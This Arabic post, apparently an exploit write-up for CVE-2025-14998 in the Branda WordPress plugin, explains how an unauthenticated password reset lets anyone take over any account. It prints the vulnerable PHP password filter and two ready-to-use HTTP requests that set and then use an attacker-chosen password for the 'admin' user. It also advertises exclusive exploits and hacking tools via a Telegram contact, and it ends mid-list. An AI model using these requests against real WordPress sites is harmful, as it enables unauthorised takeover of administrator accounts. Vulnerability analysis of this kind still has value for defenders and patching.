
CVE-2025-14998 إضافة ووردبريس - Branda – العلامة البيضاء والعلامة التجارية، مخصّص صفحة تسجيل الدخول المجاني <= 3.4.24 - تصعيد صلاحيات بدون مصادقة عبر الاستيلاء على الحساب
CVE-2025-14998 إن إضافة Branda لووردبريس عرضة لتصعيد الامتيازات عبر الاستيلاء على الحساب في جميع الإصدارات حتى 3.4.24 وما يتضمنه. ويعود السبب إلى أن الإضافة لا تتحقق بشكل صحيح من هوية المستخدم قبل تحديث كلمة المرور الخاصة به. وهذا يتيح للمهاجمين غير المصادقين تغيير كلمات مرور أي مستخدمين، بما في ذلك المسؤولين، واستغلال ذلك للوصول إلى حساباتهم.
لمزيد من ثغرات ووردبريس وأدوات الاختراق الحصرية تواصل معي على تيليجرام @KtN1990.
تقوم الإضافة بتجاوز منطق توليد كلمات المرور في ووردبريس عبر التعليق على مرشح
random_password. فبدلاً من السماح لووردبريس بتوليد كلمة مرور عشوائية آمنة، تستبدلها الإضافة بمدخل يتحكم فيه المستخدم.
public function password_random_password_filter( $password ) {
global $wpdb, $signup_password_use_encryption;
if ( isset( $_GET['key'] ) && ! empty( $_GET['key'] ) ) {
$key = $_GET['key'];
} elseif ( isset( $_POST['key'] ) && ! empty( $_POST['key'] ) ) {
$key = $_POST['key'];
}
if ( ! empty( $_POST['password_1'] ) ) {
$password = $_POST['password_1'];
} elseif ( ! empty( $key ) ) {
$signup = $wpdb->get_row(
$wpdb->prepare(
"SELECT * FROM $wpdb->signups WHERE activation_key = '%s'",
$key
)
);
if ( ! ( empty( $signup ) || $signup->active ) ) {
$meta = maybe_unserialize( $signup->meta );
if ( ! empty( $meta['password'] ) ) {
if ( 'yes' === $signup_password_use_encryption ) {
$password = $this->password_decrypt( $meta['password'] );
} else {
$password = $meta['password'];
}
}
}
}
return $password;
}
POST /wp/wp-login.php?action=lostpassword HTTP/1.1
Host: example.local
Content-Type: application/x-www-form-urlencoded
user_login=admin&
redirect_to=&
password_1=EfUSmvnTun5XbvE6RvIB&
wp-submit=Get+New+Password
يمكن أن تكون قيمة password_1 أي سلسلة نصية يتحكم بها المهاجم.
GET /wp/wp-login.php?login=admin&key=EfUSmvnTun5XbvE6RvIB&action=rp HTTP/1.1
Host: example.local
لا يلزم الوصول إلى البريد الإلكتروني أو رمز إعادة تعيين كلمة المرور الصالح.
يمكن لمهاجم غير مصادق:

-🛡️ مثالي لـ: – الباحثين في مجال الأمن – مختبِري الاختراق – القراصنة الأخلاقيين
📦 خط مُحدَّث باستمرار يضم ~230 وحدة بحثية قديمة؛ مع تحسينات حديثة في نواة الماسح لضمان الاستقرار واكتشاف أكثر دقة.
🎯 الغرض: يُوفَّر حصريًا للاختبارات الأمنية المصرّح بها والتعليم والبحث الدفاعي وتدريب الفرق الحمراء. هذا الإصدار ليس للاستخدام غير القانوني. التوزيع مقيد — الوصول فقط بعد التحقق والتوقيع على اتفاقية الاستخدام المسؤول / NDA.
-🛡 سياسة الوصول المسؤول (ملخص):